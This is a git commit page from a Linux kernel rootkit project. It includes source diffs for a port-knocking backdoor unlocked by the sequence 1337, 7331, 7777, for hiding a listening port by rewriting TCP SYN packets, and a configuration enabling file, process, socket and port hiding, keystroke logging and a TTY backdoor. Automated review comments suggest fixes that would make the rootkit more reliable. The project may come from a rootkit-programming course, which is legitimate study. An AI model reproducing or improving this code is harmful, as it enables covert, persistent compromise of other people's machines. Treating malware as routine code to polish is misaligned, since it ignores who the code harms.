linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit ae2b6f55f7b5bac1bbf85996f3a21a886474d15c
parent 13caac6bf8947bb7bc5404170b1e0e8914e6b27b
Author: deurzen <devrzen@gmail.com>
Date:   Sun, 10 Jan 2021 03:22:39 +0100

fixes port knocking bugs

Diffstat:
A.tmp_versions/g7.mod | 3+++
Msrc/g7.c | 3++-
Msrc/porthide.c | 20+++++++++++++++-----
3 files changed, 20 insertions(+), 6 deletions(-)

diff --git a/.tmp_versions/g7.mod b/.tmp_versions/g7.mod
@@ -0,0 +1,3 @@
+/root/rootkit-programming-dev/g7.ko
+/root/rootkit-programming-dev/src/pidhide.o /root/rootkit-programming-dev/src/read.o /root/rootkit-programming-dev/src/g7.o /root/rootkit-programming-dev/src/filehide.o /root/rootkit-programming-dev/src/sockhide.o /root/rootkit-programming-dev/src/hook.o /root/rootkit-programming-dev/src/openhide.o /root/rootkit-programming-dev/src/packhide.o /root/rootkit-programming-dev/src/porthide.o /root/rootkit-programming-dev/src/channel.o /root/rootkit-programming-dev/src/modhide.o /root/rootkit-programming-dev/src/inputlog.o /root/rootkit-programming-dev/src/creds.o /root/rootkit-programming-dev/src/backdoor.o
+
diff --git a/src/g7.c b/src/g7.c
@@ -45,7 +45,8 @@ rootkit_t rootkit = {
     .hiding_open = true,
     .hiding_pids = true,
     .hiding_sockets = true,
-    .hiding_packets = true,
+    .hiding_packets = false,
+    .hiding_ports = true,
     .logging_input = true,
     .backdoor = BD_TTY,
 };
diff --git a/src/porthide.c b/src/porthide.c
@@ -93,6 +93,8 @@ hide_lports(void)
     if (register_kprobe(&p_rcv_spkt))
         DEBUG_INFO("[g7] Could not insert kprobe p_rcv_spkt\n");
+
+    hide_lport(8080);
 }
 void
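Review bot: `.hiding_packets` is flipped from `true` to `false` in the same hunk that turns on `.hiding_ports`, and neither the commit message nor a comment explains the relation between the two. If the two features cannot be active at the same time (both appear to involve a hook on a packet receive function, but that is outside this hunk), the constraint belongs next to the initializer, e.g. `.hiding_packets = false, /* NOTE: not enabled together with hiding_ports -- confirm why */`; otherwise a silent default change is easy to miss. The `rootkit_t rootkit = {` initializer starts before the hunk.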
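Review bot: `hide_lport(8080)` hides a hard-coded port unconditionally at init time, with nothing in the commit message ("fixes port knocking bugs") explaining it, so it reads like a test leftover; if it is meant to stay, give the value a name and a reason, e.g. `hide_lport(DEFAULT_HIDDEN_LPORT); /* hidden from the start so the knock sequence can be exercised */`. It also runs after a failed `register_kprobe(&p_rcv_spkt)`, which is only logged, so the port lands in `hidden_lports` with no probe attached to act on it; either return early on failure or comment that the list is populated regardless. `hide_lports` begins before the hunk.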
@@ -163,27 +165,35 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
     if (list_contains_knock(&ips_stage3, ip, version))
         return 0;
+    if (tcphdr->syn || !tcphdr->ack)
+        goto check_port;
+
     if (list_contains_knock(&ips_stage2, ip, version)) {
-        if (src_port == 7777)
+        if (src_port == 7777) {
+            DEBUG_NOTICE("[g7] knocked port %d, port knocking sequence completed\n", src_port);
             add_knock_to_list(&ips_stage3_tail, ip, version);
+        }
         remove_knock_from_list(&ips_stage2, &ips_stage2_tail, ip, version);
-        goto check_port;
     } else if (list_contains_knock(&ips_stage1, ip, version)) {
-        if (src_port == 7331)
+        if (src_port == 7331) {
             add_knock_to_list(&ips_stage2_tail, ip, version);
+            DEBUG_NOTICE("[g7] knocked port %d, entering knocking stage 2\n", src_port);
+        }
         remove_knock_from_list(&ips_stage1, &ips_stage1_tail, ip, version);
-        goto check_port;
     } else {
-        if (src_port == 1337)
+        if (src_port == 1337) {
+            DEBUG_NOTICE("[g7] knocked port %d, entering knocking stage 1\n", src_port);
             add_knock_to_list(&ips_stage1_tail, ip, version);
+        }
     }
 check_port:
     if (list_contains_lport(&hidden_lports, src_port))
         if (tcphdr->syn) {
             tcphdr->syn = 0;
+            tcphdr->ack = 0;
             tcphdr->rst = 1;
         }
 }
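Review bot: In the stage-1 and stage-2 branches `remove_knock_from_list` runs for every ACK-bearing, non-SYN packet from a known IP regardless of `src_port`, so any unrelated ACK traffic from a host mid-sequence (data or FIN/ACK of an existing connection) silently resets its knock state; if that is intended, say so on the remove calls, e.g. `/* any non-knock ACK from this host aborts the sequence */`, otherwise only reset on a mismatched knock. The hide branch after `check_port:` rewrites `syn`, `ack` and `rst` in place but leaves `tcphdr->check` untouched, so the segment now carries a checksum computed for the original flags; whether anything downstream verifies it depends on where `p_rcv_spkt` is attached, which is outside this hunk, so either recompute the checksum or document why the mismatch is acceptable. The knock ports 1337, 7331 and 7777 are repeated literals across three branches and would read better as named constants such as `KNOCK_PORT_STAGE1`. `g7_packet_rcv` begins before the hunk.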